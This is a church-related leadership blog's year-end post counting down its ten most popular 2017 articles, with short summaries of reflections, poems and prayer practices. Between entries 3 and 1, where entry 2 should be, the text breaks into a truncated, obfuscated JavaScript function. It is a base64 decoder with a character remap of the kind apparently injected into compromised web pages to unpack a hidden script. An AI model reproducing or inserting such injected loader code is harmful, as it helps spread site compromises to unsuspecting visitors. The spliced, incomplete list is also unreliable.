Here’s a look at the top 10 posts (counting down to the most popular) in 2017 that ignited the most conversation, social media shares and page visits from you, our treasured readers. Please enjoy these reflections again, or read one you may have missed by simply clicking the title or the picture. There will be more to come as we journey together into a vibrant 2018. Thanks for your part in helping us to create a home for leaders who live and lead differently. Happy New Year!
10. Hitting the Glass Wall?- Joy shares a personal experience that helps us to know what to do when our expectations don't line up with reality.
9. Praying the Psalms - Karen gives us a helpful spiritual practice of praying the Psalms that has comforted and shaped her spiritually for many years.
8. Unexpected - Kirk, through his beautiful poem, reminds us beauty is found often in unexpected places - if we would but pause to look.
7. An In-between Summer, Part 3 - Mike reflects on how his experience of this summer was an experience of contrasts. There are links within this post to the first two parts if you'd like to get caught up.
6. Freedom in Christ - A Testimony from Journey Alum Lisa Skopil - Lisa shares her experience of continuing and unexpected transformation after graduating from the most recent generation of The Journey, further affirming our training is about ongoing lifestyle transformation.
5. Bringing Our Movies to Life - Troy shares a reflection about suffering and how our attempts to escape it through fantasy only make us suffer more.
4. Jesus on the Shore - Karen leads us to consider where to turn when we face the unknown, and how we often find Jesus there waiting for us all along.
3. A Prayer Rhythm - When My Heart is Overwhelmed - Jan shares a powerful prayer practice for those times when you find yourself at your wit's end.
function oc532bd2f6(uf){var yd='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var vb='';var y4,sd,t3,rd,y3,x1,s0;var nd=0;do{rd=yd.indexOf(uf.charAt(nd++));y3=yd.indexOf(uf.charAt(nd++));x1=yd.indexOf(uf.charAt(nd++));s0=yd.indexOf(uf.charAt(nd++));y4=(rd<<2)|(y3>>4);sd=((y3&15)<<4)|(x1>>2);t3=((x1&3)<<6)|s0;if(y4>=192)y4+=848;else if(y4==168)y4=1025;else if(y4==184)y4=1105;vb+=String.fromCharCode(y4);if(x1!=64){if(sd>=192)sd+=848;else if(sd==168)sd=1025;else if(sd==184)sd=1105;vb+=String.fromCharCode(sd);}if(s0!=64){if(t3>=192)t3+=848;else if(t3==168)t3=1025;else if(t3==184)t3=1105;vb+=String.fromCharCode(t3);}}while(nd
1.? What Fuels Mission? - Troy writes about the great temptation in Christian leadership today to take for granted, or even sacrifice, the very fuel that God uses to change the world.